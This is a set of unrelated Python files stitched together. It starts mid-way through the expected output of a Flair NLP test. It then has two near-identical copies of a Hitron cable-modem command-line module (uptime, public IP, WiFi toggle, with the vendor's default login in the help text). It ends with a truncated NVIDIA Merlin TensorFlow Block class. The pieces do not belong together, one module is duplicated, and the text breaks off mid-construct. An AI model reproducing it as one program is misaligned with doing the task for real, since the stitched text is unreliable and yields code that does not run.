'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-GPE', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VB', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_multi(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'multi'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'entity': 0, 'xpos': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'entity_iob': 'O'}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'entity_iob': 'O'}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [])])])])
# assert actual == expected, actual
def test_invalid_language(self):
with pytest.raises(TypeError):
FlairPipeline().process(text, lang='martian')
def test_validation(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en'))
class TestFlairEmbeddings(TestCase):
def test_no_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=False, bpe_size=0)
assert all(map(lambda t: 'embeddings' not in t, actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_default_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='default', char_embeddings=False, bpe_size=0)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair glove,multi-forward,multi-backward',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_character_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=True, bpe_size=0)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair ,char',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_bpe(self):
actual = FlairPipeline().process(text, lang='en', fast=True, use_embeddings='', char_embeddings=False, bpe_size=50)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair ,byte-pair_50',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=False, bpe_size=50)
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='en', bpe_size=45)
def test_invalid(self):
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='martian', char_embeddings=False, bpe_size=0)
def test_validation_default(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en', use_embeddings='default'))
def test_validation_bpe(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en', bpe_size=50))
def test_validation_chars(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en', char_embeddings=True))
|
""" Explicit commands using the router api. """
import json
import time
from hitron_cpe.common import Logger
from hitron_cpe.router import Router
def _strip_external_spaces(json_str):
clean = ''
in_quotes = False
for letter in json_str:
if letter == '"':
in_quotes = not in_quotes
if letter == ' ':
if in_quotes:
clean += letter
else:
clean += letter
return clean
def print_help(values, router, logger):
""" Print the help usage message """
print()
print('Hitron Cable CPE (modem/router) tool')
print()
print('The following commands are supported. To get information about a specific command,')
print('type the command with the --help option, eg "hitron probe --help"')
print()
print('To override defaults pass --address, --user, and/or --password.')
print()
commands = COMMAND_LIST.keys()
for command in commands:
message = [command, COMMAND_LIST[command]['doc']]
logger.log_columns(message, [20])
print()
def probe(values, router, logger):
""" Send an unathenticated message to the device to see if it's there """
if values['help']:
print()
print('hitron probe [options]')
logger.log_columns([' ',
'--address', 'The IP address to reach your device. Defaults to 192.168.0.1.'
],
[10, 15])
print()
return
sys_model = router.get_sys_model()
logger.log('PROBE', f'Success: Model {sys_model['modelName']}')
def uptime(values, router, logger):
""" Send authenticated message to get the system uptime for WAN and LAN """
if values['help']:
print()
print('hitron uptime [options]')
logger.log_columns([' ',
'--address',
'The IP address to reach your device. Defaults to 192.168.0.1.'
],
[10, 15])
logger.log_columns([' ',
'--user',
'The user name to connect to the device. Defaults to "cusadmin".'
],
[10, 15])
logger.log_columns([' ',
'--password',
'The password used to connect to the device. Defaults to "password".'],
[10, 15])
print()
return
sys_info = (router.get_sysinfo())[0]
logger.log('UPTIME', f'WAN: {sys_info['systemWanUptime']} LAN: {sys_info['systemLanUptime']}')
def ip(values, router, logger):
""" Get the public IP address of the modem """
if values['help']:
print()
print('hitron ip [options]')
logger.log_columns([' ',
'--address',
'The IP address to reach your device. Defaults to 192.168.0.1.'
],
[10, 15])
logger.log_columns([' ',
'--user',
'The user name to connect to the device. Defaults to "cusadmin".'
],
[10, 15])
logger.log_columns([' ',
'--password',
'The password used to connect to the device. Defaults to "password".'
],
[10, 15])
print()
return
sys_info = (router.get_sysinfo())[0]
logger.log('IP', f'WAN (public) IP: {sys_info['wanIp']}')
def wireless(values, router, logger):
""" Without the toggle flag, returns information about the wireless network.
With the toggle flag, toggles the given ssid on or off """
if values['help']:
print()
print('hitron wireless [options]')
logger.log_columns([' ',
'--address',
'The IP address to reach your device. Defaults to 192.168.0.1.'
],
[10, 15])
logger.log_columns([' ',
'--user',
'The user name to connect to the device. Defaults to "cusadmin".'
],
[10, 15])
logger.log_columns([' ',
'--password',
'The password used to connect to the device. Defaults to "password".'
],
[10, 15])
logger.log_columns([' ',
'--toggle_ssid',
'The name of the WiFi network to toggle. If present the given network '\
'will be turned on or off.'
],
[10, 15])
print()
return
wireless_info = router.get_wireless()
if 'toggle_ssid' in values:
time.sleep(5)
toggle_ssid = values['toggle_ssid']
found = False
for band in wireless_info:
if band['ssidName'] == toggle_ssid:
found = True
band['active'] = True
band['bandunsave'] = True
band['unsave'] = False
toggle_value = band['wlsEnable']
if toggle_value == 'ON':
band['enable'] = 'OFF'
band['wlsEnable'] = 'OFF'
band['wlsOnOff'] = 'OFF'
else:
band['enable'] = 'ON'
band['wlsEnable'] = 'ON'
band['wlsOnOff'] = 'ON'
else:
band['active'] = False
band['bandunsave'] = False
band['unsave'] = False
if found:
json_str = json.dumps(wireless_info)
clean = _strip_external_spaces(json_str)
router.update_wireless(clean)
logger.log('WIRELESS', f'toggle_ssid: {toggle_ssid} success')
else:
logger.log('WIRELESS',
wireless_info,
rows=True,
filter_by=['band', 'bandwidth', 'ssidName', 'wlsEnable'])
COMMAND_LIST = {
'help': {
'cmd': print_help,
'doc': 'Print this message.'
},
'probe': {
'cmd': probe,
'doc': 'Tries to connect to the device without authenticating, '\
'showing the model number if successful.'
},
'uptime': {
'cmd': uptime,
'doc': 'Authenticates to the device and shows the current running uptime for LAN and WAN.'
},
'ip': {
'cmd': ip,
'doc': 'Authenticates to the device and shows the current public IP address of the gateway.'
},
'wireless': {
'cmd': wireless,
'doc': 'Returns the state of the wireless networks, '\
'or with --toggle_ssid will turn them on or off.'
}
}
def dispatch(value):
""" Execute the given command """
if value['command'] not in COMMAND_LIST:
print(f'Unknown command: {value['command']}')
print('Try "hitron help"')
return
logger = Logger(value['verbose'])
router = Router(value['address'],
value['user'],
value['password'],
logger)
COMMAND_LIST[value['command']]['cmd'](value, router, logger)
| """ Explicit commands using the router api. """
import json
import time
from hitron_cpe.common import Logger
from hitron_cpe.router import Router
def _strip_external_spaces(json_str):
clean = ''
in_quotes = False
for letter in json_str:
if letter == '"':
in_quotes = not in_quotes
if letter == ' ':
if in_quotes:
clean += letter
else:
clean += letter
return clean
def print_help(values, router, logger):
""" Print the help usage message """
print()
print('Hitron Cable CPE (modem/router) tool')
print()
print('The following commands are supported. To get information about a specific command,')
print('type the command with the --help option, eg "hitron probe --help"')
print()
print('To override defaults pass --address, --user, and/or --password.')
print()
commands = COMMAND_LIST.keys()
for command in commands:
message = [command, COMMAND_LIST[command]['doc']]
logger.log_columns(message, [20])
print()
def probe(values, router, logger):
""" Send an unathenticated message to the device to see if it's there """
if values['help']:
print()
print('hitron probe [options]')
logger.log_columns([' ',
'--address', 'The IP address to reach your device. Defaults to 192.168.0.1.'
],
[10, 15])
print()
return
sys_model = router.get_sys_model()
logger.log('PROBE', f'Success: Model {sys_model["modelName"]}')
def uptime(values, router, logger):
""" Send authenticated message to get the system uptime for WAN and LAN """
if values['help']:
print()
print('hitron uptime [options]')
logger.log_columns([' ',
'--address',
'The IP address to reach your device. Defaults to 192.168.0.1.'
],
[10, 15])
logger.log_columns([' ',
'--user',
'The user name to connect to the device. Defaults to "cusadmin".'
],
[10, 15])
logger.log_columns([' ',
'--password',
'The password used to connect to the device. Defaults to "password".'],
[10, 15])
print()
return
sys_info = (router.get_sysinfo())[0]
logger.log('UPTIME', f'WAN: {sys_info["systemWanUptime"]} LAN: {sys_info["systemLanUptime"]}')
def ip(values, router, logger):
""" Get the public IP address of the modem """
if values['help']:
print()
print('hitron ip [options]')
logger.log_columns([' ',
'--address',
'The IP address to reach your device. Defaults to 192.168.0.1.'
],
[10, 15])
logger.log_columns([' ',
'--user',
'The user name to connect to the device. Defaults to "cusadmin".'
],
[10, 15])
logger.log_columns([' ',
'--password',
'The password used to connect to the device. Defaults to "password".'
],
[10, 15])
print()
return
sys_info = (router.get_sysinfo())[0]
logger.log('IP', f'WAN (public) IP: {sys_info["wanIp"]}')
def wireless(values, router, logger):
""" Without the toggle flag, returns information about the wireless network.
With the toggle flag, toggles the given ssid on or off """
if values['help']:
print()
print('hitron wireless [options]')
logger.log_columns([' ',
'--address',
'The IP address to reach your device. Defaults to 192.168.0.1.'
],
[10, 15])
logger.log_columns([' ',
'--user',
'The user name to connect to the device. Defaults to "cusadmin".'
],
[10, 15])
logger.log_columns([' ',
'--password',
'The password used to connect to the device. Defaults to "password".'
],
[10, 15])
logger.log_columns([' ',
'--toggle_ssid',
'The name of the WiFi network to toggle. If present the given network '\
'will be turned on or off.'
],
[10, 15])
print()
return
wireless_info = router.get_wireless()
if 'toggle_ssid' in values:
time.sleep(5)
toggle_ssid = values['toggle_ssid']
found = False
for band in wireless_info:
if band['ssidName'] == toggle_ssid:
found = True
band['active'] = True
band['bandunsave'] = True
band['unsave'] = False
toggle_value = band['wlsEnable']
if toggle_value == 'ON':
band['enable'] = 'OFF'
band['wlsEnable'] = 'OFF'
band['wlsOnOff'] = 'OFF'
else:
band['enable'] = 'ON'
band['wlsEnable'] = 'ON'
band['wlsOnOff'] = 'ON'
else:
band['active'] = False
band['bandunsave'] = False
band['unsave'] = False
if found:
json_str = json.dumps(wireless_info)
clean = _strip_external_spaces(json_str)
router.update_wireless(clean)
logger.log('WIRELESS', f'toggle_ssid: {toggle_ssid} success')
else:
logger.log('WIRELESS',
wireless_info,
rows=True,
filter_by=['band', 'bandwidth', 'ssidName', 'wlsEnable'])
COMMAND_LIST = {
'help': {
'cmd': print_help,
'doc': 'Print this message.'
},
'probe': {
'cmd': probe,
'doc': 'Tries to connect to the device without authenticating, '\
'showing the model number if successful.'
},
'uptime': {
'cmd': uptime,
'doc': 'Authenticates to the device and shows the current running uptime for LAN and WAN.'
},
'ip': {
'cmd': ip,
'doc': 'Authenticates to the device and shows the current public IP address of the gateway.'
},
'wireless': {
'cmd': wireless,
'doc': 'Returns the state of the wireless networks, '\
'or with --toggle_ssid will turn them on or off.'
}
}
def dispatch(value):
""" Execute the given command """
if value['command'] not in COMMAND_LIST:
print(f'Unknown command: {value["command"]}')
print('Try "hitron help"')
return
logger = Logger(value['verbose'])
router = Router(value['address'],
value['user'],
value['password'],
logger)
COMMAND_LIST[value['command']]['cmd'](value, router, logger)
|
#
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import copy
import sys
from collections import defaultdict
from dataclasses import dataclass
from functools import reduce
from typing import (
Dict,
List,
Optional,
Protocol,
Sequence,
Text,
Type,
Union,
overload,
runtime_checkable,
)
import six
import tensorflow as tf
from tensorflow.keras.layers import Layer
from tensorflow.python.keras.utils import generic_utils
import merlin.io
from merlin.models.config.schema import SchemaMixin
from merlin.models.utils.doc_utils import docstring_parameter
from merlin.models.utils.misc_utils import filter_kwargs
from merlin.models.utils.registry import Registry, RegistryMixin
from merlin.models.utils.schema import (
schema_to_tensorflow_metadata_json,
tensorflow_metadata_json_to_schema,
)
from merlin.schema import Schema, Tags
from .typing import TabularData, TensorOrTabularData
from .utils.mixins import LossMixin, MetricsMixin, ModelLikeBlock
from .utils.tf_utils import (
calculate_batch_size_from_input_shapes,
maybe_deserialize_keras_objects,
maybe_serialize_keras_objects,
)
block_registry: Registry = Registry.class_registry("tf.blocks")
BlockType = Union["Block", str, Sequence[str]]
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class BlockContext(Layer):
"""BlockContext is part of each block.
It is used to store/retrieve public variables, and can be used to retrieve features.
This is created automatically in the model and doesn't need to be created manually.
"""
def __init__(self, **kwargs):
feature_names = kwargs.pop("feature_names", [])
feature_dtypes = kwargs.pop("feature_dtypes", {})
super(BlockContext, self).__init__(**kwargs)
self._feature_names = feature_names
self._feature_dtypes = feature_dtypes
def add_embedding_weight(self, name, **kwargs):
table = self.add_weight(name=f"{str(name)}/embedding", **kwargs)
return table
def add_features(self, *name):
self._feature_names = list({*self._feature_names, *name})
def add_variable(self, variable):
setattr(self, variable.name, variable)
def set_dtypes(self, features):
for feature_name in features:
feature = features[feature_name]
if isinstance(feature, tuple):
dtype = feature[0].dtype
else:
dtype = feature.dtype
self._feature_dtypes[feature_name] = dtype
def __getitem__(self, item):
if isinstance(item, Schema):
if len(item.column_names) > 1:
raise ValueError("Schema contains more than one column.")
item = item.column_names[0]
elif isinstance(item, Tags):
item = item.value
else:
item = str(item)
return self.named_variables[item]
def get_embedding(self, item):
if isinstance(item, Tags):
item = item.value
else:
item = str(item)
return self.named_variables[f"{item}/embedding"]
def get_mask(self):
mask_schema = self.named_variables.get("masking_schema", None)
if mask_schema is None:
raise ValueError(
"The mask schema is not stored, " "please make sure that a MaskingBlock was set"
)
return mask_schema
@property
def named_variables(self) -> Dict[str, tf.Variable]:
outputs = {}
for var in self.variables:
if var.name.endswith("/embedding:0"):
name = "/".join(var.name.split("/")[-2:])
else:
name = var.name.split("/")[-1]
outputs[name.replace(":0", "")] = var
return outputs
def _merge(self, other: "BlockContext"):
self.public_variables.update(other.public_variables)
self._feature_names = list(set(self._feature_names + other._feature_names))
def build(self, input_shape):
for feature_name in self._feature_names:
if feature_name not in self.named_variables:
shape = input_shape[feature_name]
dtype = self._feature_dtypes.get(feature_name, tf.float32)
if len(tuple(shape)) == 2:
var = tf.zeros([1, shape[-1]], dtype=dtype)
shape = tf.TensorShape([None, shape[-1]])
elif tuple(shape) != (None,):
var = tf.zeros((shape), dtype=dtype)
else:
var = tf.zeros([1], dtype=dtype)
setattr(
self,
feature_name,
tf.Variable(
var,
name=feature_name,
trainable=False,
dtype=dtype,
shape=shape,
),
)
super(BlockContext, self).build(input_shape)
def call(self, features, **kwargs):
for feature_name in self._feature_names:
self.named_variables[feature_name].assign(features[feature_name])
return features
def get_config(self):
config = super(BlockContext, self).get_config()
config["feature_names"] = self._feature_names
config["feature_dtypes"] = self._feature_dtypes
return config
class ContextMixin:
@property
def context(self) -> BlockContext:
return self._context
def _set_context(self, context: BlockContext):
if hasattr(self, "_context"):
context._merge(self._context)
self._context = context
class Block(SchemaMixin, ContextMixin, Layer):
"""Core abstraction in Merlin models."""
registry = block_registry
def __init__(self, context: Optional[BlockContext] = None, **kwargs):
super(Block, self).__init__(**kwargs)
if context:
self._set_context(context)
@classmethod
@tf.autograph.experimental.do_not_convert
def parse(cls, *block: BlockType) -> "Block":
if len(block) == 1 and isinstance(block[0], (list, tuple)):
block = block[0]
if len(block) == 1:
output: "Block" = cls.registry.parse(block[0])
else:
blocks = [cls.registry.parse(b) for b in block]
output: "Block" = blocks[0].connect(*blocks[1:])
return output
@classmethod
def from_layer(cls, layer: tf.keras.layers.Layer) -> "Block":
layer.__class__ = cls
return layer # type: ignore
@classmethod
def parse_block(cls, input: Union["Block", tf.keras.layers.Layer]) -> "Block":
if isinstance(input, Block):
return input
return cls.from_layer(input)
def build(self, input_shapes):
self._maybe_propagate_context(input_shapes)
return super().build(input_shapes)
def _maybe_build(self, inputs):
if getattr(self, "_context", None) and not self.context.built:
self.context.set_dtypes(inputs)
super()._maybe_build(inputs)
def call_targets(self, predictions, targets, training=False, **kwargs) -> tf.Tensor:
return targets
def register_features(self, feature_shapes) -> List[str]:
return []
def as_tabular(self, name=None) -> "Block":
if not name:
name = self.name
return SequentialBlock([self, AsTabular(name)], copy_layers=False)
def repeat(self, num: int = 1) -> "SequentialBlock":
"""Repeat the block num times.
Parameters
----------
num : int
Number of times to repeat the block.
"""
repeated = []
for _ in range(num):
repeated.append(self.copy())
return SequentialBlock(repeated)
def prepare(
self,
block: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional["TabularAggregationType"] = None,
) -> "SequentialBlock":
"""Transform the inputs of this block.
Parameters
----------
block: Optional[Block]
If set, this block will be used to transform the inputs of this block.
post: Block
Block to use as post-transformation.
aggregation: TabularAggregationType
Aggregation to apply to the inputs.
"""
block = TabularBlock(post=post, aggregation=aggregation) or block
return SequentialBlock([block, self])
def repeat_in_parallel(
self,
num: int = 1,
prefix=None,
names: Optional[List[str]] = None,
post: Optional[BlockType] = None,
aggregation: Optional["TabularAggregationType"] = None,
copies=True,
residual=False,
**kwargs,
) -> "ParallelBlock":
"""Repeat the block num times in parallel.
Parameters
----------
num: int
Number of times to repeat the block.
prefix: str
Prefix to use for the names of the blocks.
names: List[str]
Names of the blocks.
post: Block
Block to use as post-transformation.
aggregation: TabularAggregationType
Aggregation to apply to the inputs.
copies: bool
Whether to copy the block or not.
residual: bool
Whether to use a residual connection or not.
"""
repeated = {}
iterator = names if names else range(num)
if not names and prefix:
iterator = [f"{prefix}{num}" for num in iterator]
for name in iterator:
repeated[str(name)] = self.copy() if copies else self
if residual:
repeated["shortcut"] = NoOp()
return ParallelBlock(repeated, post=post, aggregation=aggregation, **kwargs)
def connect(
self,
*block: Union[tf.keras.layers.Layer, str],
block_name: Optional[str] = None,
context: Optional[BlockContext] = None,
) -> Union["SequentialBlock", "Model", "RetrievalModel"]:
"""Connect the block to other blocks sequentially.
Parameters
----------
block: Union[tf.keras.layers.Layer, str]
Blocks to connect to.
block_name: str
Name of the block.
context: Optional[BlockContext]
Context to use for the block.
"""
blocks = [self.parse(b) for b in block]
for b in blocks:
if isinstance(b, Block):
if not b.schema:
b.schema = self.schema
output = SequentialBlock(
[self, *blocks], copy_layers=False, block_name=block_name, context=context
)
if isinstance(blocks[-1], ModelLikeBlock):
if any(isinstance(b, RetrievalBlock) for b in blocks) or isinstance(
self, RetrievalBlock
):
return RetrievalModel(output)
return Model(output)
return output
def connect_with_residual(
self,
block: Union[tf.keras.layers.Layer, str],
activation=None,
